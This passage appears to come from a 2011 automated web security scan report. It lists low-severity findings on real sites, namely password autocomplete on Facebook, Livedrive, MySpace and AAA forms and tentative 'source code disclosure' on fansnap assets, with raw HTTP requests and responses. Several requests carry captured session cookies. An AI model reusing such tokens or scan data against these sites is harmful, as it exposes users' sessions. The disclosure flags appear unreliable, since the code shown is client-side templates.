<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.21. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

15.22. http://www.facebook.com/pages/create.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/create.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.23. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.24. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.25. http://www.facebook.com/r.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/r.php

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="fedd9a47074e63aa1e84ddd49e2a5b8d" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

15.26. http://www.facebook.com/terms.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The page contains a form with the following action URL:

https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.27. http://www.livedrive.com/SignupToLivedrive previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/SignupToLivedrive

Issue detail

The page contains a form with the following action URL:

https://www.livedrive.com/SignupToLivedrive?market=US

The form contains the following password fields with autocomplete enabled:

Password
Confirm

Request

GET /SignupToLivedrive?market=US HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/ForHome/ProSuite
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; rotateProductNavPane=7; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.2.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

   Sign up for Livedrive
...[SNIP]...
</div>

       <form action="https://www.livedrive.com/SignupToLivedrive?market=US" method="post">

<div class="page-box-red">
...[SNIP]...
</label>
    <input id="Password" maxlength="255" name="Password" type="password" />

    <label for="Confirm">
...[SNIP]...
</label>
    <input id="Confirm" maxlength="255" name="Confirm" type="password" />
</fieldset>
...[SNIP]...

15.28. http://www.myspace.com/auth/loginform previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/auth/loginform

Issue detail

The page contains a form with the following action URL:

https://www.myspace.com/auth/login

The form contains the following password field with autocomplete enabled:

Password

Request

GET /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E HTTP/1.1
Host: www.myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634466573070107947&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; SessionDDF2=uVsidkC9gs9LxsRzCwBpAqNpUhZIkNkh4AxUscS1Wh/5D61/I2xWndq6Yq1d3SssDjs2CU1kxAVylC6iru8MRA==

Response

15.29. http://www.nne.aaa.com/en-nne/Pages/Home.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/en-nne/Pages/Home.aspx

Issue detail

The page contains a form with the following action URL:

http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com

The form contains the following password field with autocomplete enabled:

Password

Request

Response

16. Source code disclosure previous next
There are 7 instances of this issue:

http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs
http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs
http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js
http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundle2.js
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js
http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js
http://www.seapine.com/ttpro.html

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

16.1. http://bing.fansnap.com/ejs_templates/seats_page/known_tooltip.ejs previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://bing.fansnap.com
Path:	/ejs_templates/seats_page/known_tooltip.ejs

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /ejs_templates/seats_page/known_tooltip.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B2dJOHBjoLb2Zmc2V0af6QnQ%3D%3D--8a1ac49a36095f4dbcf7a97d829c4d094b2f91ed

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 13 Sep 2010 17:59:33 GMT
ETag: "27341ca-2e1-dbd2eb40"
Accept-Ranges: bytes
Content-Length: 737
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="vfs-tooltip">
<div class="vfs-tooltip-img">
<% switch(format) {
case 'none':
var src = '/images/rollover-no-vfs.png';
break;
case 'default':
var src = imgPath;
break;
default:
var src = '/images/loadingnew.gif';
}
%>
<%= img_tag(src, "View from seat") %>
</div>
...[SNIP]...
<strong><%= section %></strong>
<% if (row) { %>
<strong>- <%= row %></strong>
...[SNIP]...
<div class="vfs-det-ticks">
<%=seats%> from $<%=price%>
</div>
...[SNIP]...

16.2. http://bing.fansnap.com/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://bing.fansnap.com
Path:	/ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /ejs_templates/seats_page/ticket_sets/new_base/marker/photo_sec_none.ejs?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B9mjiKBjoLb2Zmc2V0af6QnQ%3D%3D--406bc3695b0c3407dbc0a7c3d9f043fb02bee7a5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Jan 2011 00:52:57 GMT
ETag: "9d01e4-1dd-b07bec40"
Accept-Ranges: bytes
Content-Length: 477
Connection: close
Content-Type: text/plain; charset=UTF-8

<div class="ugc-sec-photo">
<% if (uploadEnabled) { %>
<a href="/photos/new?entity_id=<%= venueId %>&entity_type=Venue&cat=<%= catId %>&seating_detail[section]=<%= escapedSection %>&seating_detail[user_input]=<%= escapedSection %>&seating_detail[row]=<%= escapedRow %>" target="_blank">
<%= img_tag('/images/rollover-vfs-upload.png', '') %>
</a>
<% } else { %>
<%= img_tag('/images/rollover-vfs-upload.png', '') %>
<% } %>
...[SNIP]...

16.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: OR7ncKwYvc5cp5ICj0h8IEPnrtRoILVjGMI3SFA2P8fmjLESYfEqvpeAXoGi3JEm
x-amz-request-id: FFE99421EFAA9283
Date: Tue, 12 Jul 2011 18:00:07 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:02:29 GMT
ETag: "375af793d6130c7c9074d680589bbc99"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 157752
Server: AmazonS3
Age: 610479
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 94f116c7e716af4a748cff83c3b92ec29316206f5f44be2d4a14aacb7cc60260265b3bdaf16d9578
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 fa6a26613abf7b82a2d399c330c31b47.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function($){var topics={};$.fn.publish=function(topic,args,sync){if(typeof topics[topic]=="undefined"){return this;}
var args=args||[],argsLength=args.length,t=topics[topic],l=t.length,that=this,publ
...[SNIP]...
each(_.functions(obj),function(name){addToWrapper(name,_[name]=obj[name]);});};var idCounter=0;_.uniqueId=function(prefix){var id=idCounter++;return prefix?prefix+id:id;};_.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g};_.template=function(str,data){var c=_.templateSettings;var tmpl='var __p=[],print=function(){__p.push.apply(__p,arguments);};'+'with(obj||{}){__p.push(\''+
str.replace(/\\/g,'\\\\').replace(/'/g,"\
...[SNIP]...
ame:userName,userXid:user.get("userXid"),venueName:venueName};var name=eventName;if(opts.nameTemplate){name=this._renderTemplate(opts.nameTemplate,context);}
var captionTemplate=opts.captionTemplate||"<%= eventDate %> in <%= eventCity %>.";var caption=this._renderTemplate(captionTemplate,context);var hash=opts.hash;if(opts.hashTemplate){hash=this._renderTemplate(opts.hashTemplate,context);}
var params={method:'feed',name:name,caption:
...[SNIP]...
entifyingData:function(){var idString=this.uid+'|'+this.style+'|'+this.channel+'|'+this.ctx;return idString;}};if(typeof preCompiledEJSTemplates=='undefined'){var preCompiledEJSTemplates={};}
var str='<% var broker_ids = [];\n\
for(broker_id in brokers) {\n\
broker_ids[brokers[broker_id][\'sort_order\']] = broker_id;\n\
};\n\
%>\n\
<div id="broker_filter" class="in-map-filter-holder">
...[SNIP]...
<h2>Providers (<%= num_brokers %>)</h2>
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < broker_ids.length; i++) { %>\n\
<li class="in-map-filter-<%= logos_enabled ? "bg" : "no" %>-img">
...[SNIP]...
<div class="in-map-filter-labels">\n\
<% if(logos_enabled) { %>\n\
<%= img_tag(cdn_asset_path(\'/images/logos/provider-medium-\'+ broker_ids[i] +\'.gif\'), broker_id +\'_id\') %>\n\
<% } %>
...[SNIP]...
<label for="<%= broker_ids[i] %>_id">\n\
<%= brokers[broker_ids[i]]["name"] %> (<strong><%= brokers[broker_ids[i]]["seat_count"] %></strong>)\n\
<% if (channel.forceParam) {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details?ch=\' + channel.code;\n\
}\n\
else {\n\
var link = \'/brokers/\' + broker_ids[i] + \'/details\';\n\
}\n\
%>\n\
[<a href=\'<%= link %>\' onclick=\'broker_popup(this.href); return false;\'>
...[SNIP]...
<input type="checkbox" class="flt_brk" name="brks[]" id="<%= broker_ids[i] %>_id" value="<%= broker_ids[i] %>" <%= brokers[broker_ids[i]][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>
...[SNIP]...
<div id="locationList">\n\
<%= lookupEjsTemplate(\'seats_page/location_filter_inner.ejs\').render({\'facets\': facets, \'outer_class_name\': "flt_area", \'outer_input_name\': \'areas[]\', \'child_class_name\': \'flt_sec\', \'child_input_name\': \'secs[]\'})%>\n\
<div class="in-map-select">
...[SNIP]...
<ul>\n\
<% for(var i = 0; i < facets.length; i++) { %>\n\
<li class="static-list-ele">
...[SNIP]...
<input type="checkbox" id="areas[]-<%= facets[i].id%>" name="areas[]" value="<%= facets[i].id%>" class="<%= outer_class_name %>" <%=facets[i][\'start_checked\'] ? \' checked="checked"\' : \'\' %>/>\n\
<label class="static-list-label"><%= facets[i].name %></label>\n\
<% if (facets[i].children) { %>\n\
<span class=\'expandable\'>
...[SNIP]...
<ul class="mSecList" >\n\
<% for(var j=0; j < facets[i].children.length; j++) { %>\n\
<li class="mSecListItems">
...[SNIP]...
<input type="checkbox" class="<%= child_class_name %>" name="secs[]" value="<%= facets[i].children[j].id %>" <%=facets[i].children[j][\'start_checked\'] ? \' checked="checked"\' : \'\' %> />
...[SNIP]...
<label> <%= facets[i].children[j].name %> </label>
...[SNIP]...
</div>\n\
